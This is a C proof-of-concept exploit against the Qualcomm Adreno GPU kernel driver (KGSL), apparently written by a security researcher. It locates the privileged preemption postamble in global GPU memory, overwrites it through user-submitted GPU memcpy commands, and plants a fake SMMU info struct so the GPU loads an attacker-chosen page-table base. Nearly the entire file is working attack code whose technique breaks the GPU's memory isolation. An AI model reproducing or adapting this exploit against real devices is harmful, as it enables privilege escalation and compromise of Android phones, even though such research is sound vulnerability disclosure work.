#define _GNU_SOURCE
#include <err.h>
#include <stddef.h>
#include <poll.h>
#include <fcntl.h>
#include <ctype.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <stdint.h>
#include <stdbool.h>
#include <stdlib.h>
#include <assert.h>
#include <stdio.h>
#include <sys/stat.h>
#include <sys/prctl.h>
#include <sys/ioctl.h>
#include <sys/mman.h>

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})


#define KGSL_IOC_TYPE 0x09

#define KGSL_MEMALIGN_SHIFT		16
#define KGSL_MEMFLAGS_USE_CPU_MAP 0x10000000ULL
#define KGSL_MEMFLAGS_IOCOHERENT  0x80000000ULL
#define KGSL_CACHEMODE_SHIFT 26
#define KGSL_CACHEMODE_WRITEBACK 3
#define KGSL_MEMTYPE_SHIFT		8
#define KGSL_MEMTYPE_OBJECTANY			0
struct kgsl_gpumem_alloc {
	unsigned long gpuaddr; /* output param */
	size_t size;
	unsigned int flags;
};
#define IOCTL_KGSL_GPUMEM_ALLOC \
	_IOWR(KGSL_IOC_TYPE, 0x2f, struct kgsl_gpumem_alloc)

struct kgsl_command_object {
	uint64_t offset;
	uint64_t gpuaddr;
	uint64_t size;
	unsigned int flags;
	unsigned int id;
};

#define KGSL_CMDLIST_IB             0x00000001U
struct kgsl_gpu_command {
	uint64_t flags;
	uint64_t cmdlist;
	unsigned int cmdsize;
	unsigned int numcmds;
	uint64_t objlist;
	unsigned int objsize;
	unsigned int numobjs;
	uint64_t synclist;
	unsigned int syncsize;
	unsigned int numsyncs;
	unsigned int context_id;
	unsigned int timestamp;
};
#define IOCTL_KGSL_GPU_COMMAND \
	_IOWR(KGSL_IOC_TYPE, 0x4A, struct kgsl_gpu_command)

struct kgsl_timestamp_event {
	int type;                /* Type of event (see list below) */
	unsigned int timestamp;  /* Timestamp to trigger event on */
	unsigned int context_id; /* Context for the timestamp */
	void *priv;	 /* Pointer to the event specific blob */
	size_t len;              /* Size of the event specific blob */
};
#define KGSL_TIMESTAMP_EVENT_FENCE 2
struct kgsl_timestamp_event_fence {
	int fence_fd; /* Fence to signal */
};
#define IOCTL_KGSL_TIMESTAMP_EVENT \
	_IOWR(KGSL_IOC_TYPE, 0x33, struct kgsl_timestamp_event)

/* --- context flags --- */
#define KGSL_CONTEXT_NO_GMEM_ALLOC	0x00000002
#define KGSL_CONTEXT_SUBMIT_IB_LIST	0x00000004
#define KGSL_CONTEXT_PREAMBLE		0x00000010

struct kgsl_drawctxt_create {
	unsigned int flags; // KGSL_CONTEXT_* bitmask
	unsigned int drawctxt_id; /*output param */
};
#define IOCTL_KGSL_DRAWCTXT_CREATE \
	_IOWR(KGSL_IOC_TYPE, 0x13, struct kgsl_drawctxt_create)

struct kgsl_drawctxt_destroy {
	unsigned int drawctxt_id;
};
#define IOCTL_KGSL_DRAWCTXT_DESTROY \
	_IOW(KGSL_IOC_TYPE, 0x14, struct kgsl_drawctxt_destroy)


#define CP_TYPE4_PKT	(4 << 28)
#define CP_TYPE7_PKT	(7 << 28)

#define CP_NOP                  0x10
#define CP_WAIT_FOR_ME          0x13
#define CP_REG_RMW		0x21
#define CP_WAIT_FOR_IDLE        0x26
#define CP_WAIT_REG_MEM         0x3c
#define CP_MEM_WRITE            0x3d
#define CP_REG_TO_MEM		0x3e
#define CP_INDIRECT_BUFFER_PFE  0x3f
#define CP_SET_DRAW_STATE       0x43
#define CP_SMMU_TABLE_UPDATE 	  0x53
#define CP_INDIRECT_BUFFER_CHAIN 0x57
#define CP_MEM_TO_MEM           0x73
#define CP_MEMCPY 0x75

#define CP_WAIT_MEM_WRITES     0x12

#define upper_32_bits(n) ((uint32_t)(((n) >> 16) >> 16))
#define lower_32_bits(n) ((uint32_t)(n))

void emit_gpuaddr(uint32_t **cmds_ptr, uint64_t gpuaddr) {
  *(*cmds_ptr)++ = lower_32_bits(gpuaddr);
  *(*cmds_ptr)++ = upper_32_bits(gpuaddr);
}

static inline uint pm4_calc_odd_parity_bit(uint val) {
    return (0x9669 >> (0xf & ((val) ^
                              ((val) >> 4) ^ ((val) >> 8) ^ ((val) >> 12) ^
                              ((val) >> 16) ^ ((val) >> 20) ^ ((val) >> 24) ^
                              ((val) >> 28)))) & 1;
}

static inline uint cp_type7_packet(uint opcode, uint cnt) {
    return CP_TYPE7_PKT | ((cnt) << 0) |
           (pm4_calc_odd_parity_bit(cnt) << 15) |
           (((opcode) & 0x7F) << 16) |
           ((pm4_calc_odd_parity_bit(opcode) << 23));
}

static inline uint cp_type4_packet(uint opcode, uint cnt)
{
	return CP_TYPE4_PKT | ((cnt) << 0) |
	(pm4_calc_odd_parity_bit(cnt) << 7) |
	(((opcode) & 0x3FFFF) << 8) |
	((pm4_calc_odd_parity_bit(opcode) << 27));
}
// END HEADERS FOR GPU COMMANDS


unsigned long gpumem_alloc(int kgsl_fd, size_t size, unsigned int flags) {
  struct kgsl_gpumem_alloc kga = { .size = size, .flags = flags };
  SYSCHK(ioctl(kgsl_fd, IOCTL_KGSL_GPUMEM_ALLOC, &kga));
  return kga.gpuaddr;
}

void gpu_execute(int kgsl_fd, uint32_t ctx_id, unsigned long gpuaddr, int num_insns) {
  struct kgsl_command_object cmd = {
    .gpuaddr = gpuaddr,
    .size = num_insns*4,
    .flags = KGSL_CMDLIST_IB
  };
  struct kgsl_gpu_command req = {
    .flags = KGSL_CONTEXT_SUBMIT_IB_LIST,
    .cmdlist = (unsigned long)&cmd,
    .cmdsize = sizeof(struct kgsl_command_object),
    .numcmds = 1,
    .context_id = ctx_id,
  };
  SYSCHK(ioctl(kgsl_fd, IOCTL_KGSL_GPU_COMMAND, &req));

  struct kgsl_timestamp_event_fence tef = { .fence_fd = -1 };
  struct kgsl_timestamp_event tse = {
    .type = KGSL_TIMESTAMP_EVENT_FENCE,
    .timestamp = req.timestamp,
    .context_id = ctx_id,
    .priv = &tef,
    .len = sizeof(tef)
  };
  SYSCHK(ioctl(kgsl_fd, IOCTL_KGSL_TIMESTAMP_EVENT, &tse));
  assert(tef.fence_fd != -1);
  struct pollfd pollfd = { .fd = tef.fence_fd, .events = POLLIN };
  SYSCHK(poll(&pollfd, 1, -1));
  close(tef.fence_fd);
}

// https://github.com/robclark/kilroy/blob/master/kgsl.c uses:
//  - KGSL_CONTEXT_NO_GMEM_ALLOC
//  - KGSL_CONTEXT_PREAMBLE
//  - KGSL_CONTEXT_PER_CONTEXT_TS
//  - KGSL_CONTEXT_USER_GENERATED_TS
//  - 1 << KGSL_CONTEXT_PRIORITY_SHIFT
//  - KGSL_CONTEXT_TYPE_GL << KGSL_CONTEXT_TYPE_SHIFT
//
// adrenaline uses:
//  - KGSL_CONTEXT_NO_GMEM_ALLOC
//  - KGSL_CONTEXT_PREAMBLE
//  - KGSL_CONTEXT_PWR_CONSTRAINT
//  - 1 << KGSL_CONTEXT_PRIORITY_SHIFT
//
// driver requires:
//  - KGSL_CONTEXT_PREAMBLE
//  - KGSL_CONTEXT_NO_GMEM_ALLOC
uint32_t drawctxt_create(int kgsl_fd, unsigned int flags) {
  struct kgsl_drawctxt_create arg = {
    .flags = flags | KGSL_CONTEXT_PREAMBLE | KGSL_CONTEXT_NO_GMEM_ALLOC
  };
  SYSCHK(ioctl(kgsl_fd, IOCTL_KGSL_DRAWCTXT_CREATE, &arg));
  return arg.drawctxt_id;
}

void drawctxt_destroy(int kgsl_fd, uint32_t ctx) {
  struct kgsl_drawctxt_destroy arg = { .drawctxt_id = ctx };
  SYSCHK(ioctl(kgsl_fd, IOCTL_KGSL_DRAWCTXT_DESTROY, &arg));
}

void emit_gpu_memcpy(uint32_t **cmds_ptr, unsigned long dst, unsigned long src, unsigned long len) {
  if (len % 4 != 0)
    errx(1, "gpu memcpy for non-multiple-of-4 length");
  *(*cmds_ptr)++ = cp_type7_packet(CP_MEMCPY, 5);
  *(*cmds_ptr)++ = len / 4;
  emit_gpuaddr(cmds_ptr, src);
  emit_gpuaddr(cmds_ptr, dst);
}

/* Do we need this? Who knows. Not me. I'm a security researcher, not a GPU
 * driver engineer. Just throw the maximum level of synchronization we can get
 * at this to avoid hard-to-debug issues.
 */
void emit_cargo_cult_sync(uint32_t **cmds_ptr) {
  *(*cmds_ptr)++ = cp_type7_packet(CP_WAIT_MEM_WRITES, 0);
  *(*cmds_ptr)++ = cp_type7_packet(CP_WAIT_FOR_IDLE, 0);
}

#define KGSL_IOMMU_SPLIT_TABLE_BASE 0x0001ff8000000000UL
#define KGSL_IOMMU_GLOBAL_MEM_SIZE (20 * 1024*1024)
#define POSTAMBLE_OFF 0x320
#define POSTAMBLE_NUM_INSNS 11
#define POSTAMBLE_SIZE (4 * POSTAMBLE_NUM_INSNS)

/**
 * struct gen7_cp_smmu_info - CP preemption SMMU info.
 * @magic: (00) The value at this offset must be equal to
 * GEN7_CP_SMMU_INFO_MAGIC_REF
 * @_pad4: (04) Reserved/padding
 * @ttbr0: (08) Base address of the page table for the * incoming context
 * @asid: (16) Address Space IDentifier (ASID) of the incoming context
 * @context_idr: (20) Context Identification Register value
 * @context_bank: (24) Which Context Bank in SMMU to update
 */
struct gen7_cp_smmu_info {
	uint32_t magic;
	uint32_t _pad4;
	uint64_t ttbr0;
	uint32_t asid;
	uint32_t context_idr;
	uint32_t context_bank;
};

#define GEN7_CP_CONTEXT_SWITCH_SMMU_INFO_LOHI 0x8a1 /* 2 registers */

int main(void) {
  setbuf(stdout, NULL);
  setbuf(stderr, NULL);
  printf("PID %d\n", getpid());

  // set up some shared memory with the GPU
  int kgsl_fd = SYSCHK(open("/dev/kgsl-3d0", O_RDWR));
  unsigned long normal_gpuaddr = gpumem_alloc(kgsl_fd, 0x50000, (2<<KGSL_MEMALIGN_SHIFT) | KGSL_MEMFLAGS_USE_CPU_MAP | (KGSL_CACHEMODE_WRITEBACK << KGSL_CACHEMODE_SHIFT) | (KGSL_MEMTYPE_OBJECTANY << KGSL_MEMTYPE_SHIFT) | KGSL_MEMFLAGS_IOCOHERENT);
  char *normal = SYSCHK(mmap(NULL, 0x50000, PROT_READ|PROT_WRITE, MAP_SHARED, kgsl_fd, normal_gpuaddr));
  memset(normal, 'F', 0x50000);

  // we'll place commands at the start of the shared memory region
  unsigned long cmds_gpu = normal_gpuaddr;
  uint32_t *cmds_base = (uint32_t*)normal;

  unsigned long data_page_gpu = normal_gpuaddr + 0x40000;
  char *data_page_cpu = normal + 0x40000;

  // instructions emitted by gen7_preemption_init()
  uint32_t original_postamble[POSTAMBLE_NUM_INSNS] = {
    cp_type7_packet(CP_REG_RMW, 3),
      0x50e/*GEN7_RBBM_PERFCTR_SRAM_INIT_CMD*/, 0x0, 0x1,
    cp_type7_packet(CP_WAIT_REG_MEM, 6),
      0x3, 0x50f/*GEN7_RBBM_PERFCTR_SRAM_INIT_STATUS*/, 0x0, 0x1, 0x1, 0x0
  };

  printf("searching for preempt_scratch...\n");
  unsigned long postamble_addr = 0;
  for (unsigned long off = POSTAMBLE_OFF; off < KGSL_IOMMU_GLOBAL_MEM_SIZE; off += 0x1000) {
    uint32_t drawctxt_tmp = drawctxt_create(kgsl_fd, 0);
    unsigned long gpu_test_addr = KGSL_IOMMU_SPLIT_TABLE_BASE+off;

    memset(data_page_cpu, 'F', 4*POSTAMBLE_SIZE);

    uint32_t *cmds = cmds_base;
    emit_gpu_memcpy(&cmds, data_page_gpu, gpu_test_addr, POSTAMBLE_SIZE);
    emit_cargo_cult_sync(&cmds);
    gpu_execute(kgsl_fd, drawctxt_tmp, cmds_gpu, cmds - cmds_base);

    if (memcmp(data_page_cpu, original_postamble, POSTAMBLE_SIZE) == 0) {
      postamble_addr = gpu_test_addr;
      // no need to check for more candidates and it's way faster this way
      break;
    }

    drawctxt_destroy(kgsl_fd, drawctxt_tmp);
  }
  if (!postamble_addr)
    errx(1, "found no candidates for preempt_scratch");
  printf("privileged postamble code is at 0x%lx\n", postamble_addr);

  // in case there's some dmesg ratelimiting of fault messages?
  printf("sleeping 10s... ");
  sleep(10);
  printf("continuing.\n");

  // Write our own fake smmu_info into the shared memory region.
  // We'll copy it into unused space in the preempt_scratch later (to make it
  // globally accessible for all GPU users).
  struct gen7_cp_smmu_info *fake_smmu_info = (void*)data_page_cpu;
  fake_smmu_info->magic = 0x241350d5;
  fake_smmu_info->_pad4 = 0;
  fake_smmu_info->ttbr0 = 0x1337000000;
  fake_smmu_info->asid = 0xdecafbad;
  fake_smmu_info->context_idr = 0;
  fake_smmu_info->context_bank = 0;

  // Emit our own privileged GPU instructions into the shared memory region.
  // We'll copy them into the preempt_scratch later.
  unsigned long fake_smmu_info_addr = (postamble_addr & ~0xfffUL) + 0x800;
  unsigned long trampoline_postamble_gpu = normal_gpuaddr + 0x43000;
  uint32_t *trampoline_postamble = (uint32_t*)(normal + 0x43000);
  uint32_t *tp = trampoline_postamble;
  *tp++ = cp_type4_packet(GEN7_CP_CONTEXT_SWITCH_SMMU_INFO_LOHI, 2);
  emit_gpuaddr(&tp, fake_smmu_info_addr);
  // pad with NOPs
  for (int i=tp-trampoline_postamble; i<11; i++)
    trampoline_postamble[i] = cp_type7_packet(CP_NOP, 0);

  // Now, on the GPU...
  uint32_t *cmds = cmds_base;
  // ... store our fake smmu_info in some unused space in the preempt_scratch...
  emit_gpu_memcpy(&cmds, fake_smmu_info_addr, data_page_gpu, sizeof(struct gen7_cp_smmu_info));
  emit_cargo_cult_sync(&cmds);
  // ... and overwrite the postamble.
  emit_gpu_memcpy(&cmds, postamble_addr, trampoline_postamble_gpu, POSTAMBLE_SIZE);
  emit_cargo_cult_sync(&cmds);
  uint32_t drawctxt_normal = drawctxt_create(kgsl_fd, 0);
  gpu_execute(kgsl_fd, drawctxt_normal, cmds_gpu, cmds - cmds_base);

  printf("done. gpu should crash soon.\n");
  /*
   * What should happen now:
   * 1. Some GPU context randomly gets preempted.
   * 2. The GPU starts running the postamble (which we've overwritten) in
   *    privileged mode.
   * 3. Our postamble overwrites the register holding the address of smmu_info.
   * 4. At some point, the GPU tries to switch MMU state based on smmu_info.
   *    The kernel will have written new state into the original smmu_info,
   *    but the GPU now reads our version of the smmu_info instead.
   * 5. The GPU's MMU sets TTBR0 to 0x1337000000.
   * 6. 0x1337000000 is (probably) not a sufficiently valid GPU page table, and
   *    some GPU page fault happens.
   * 7. KGSL complains in dmesg that TTBR0 is wrong.
   */
}
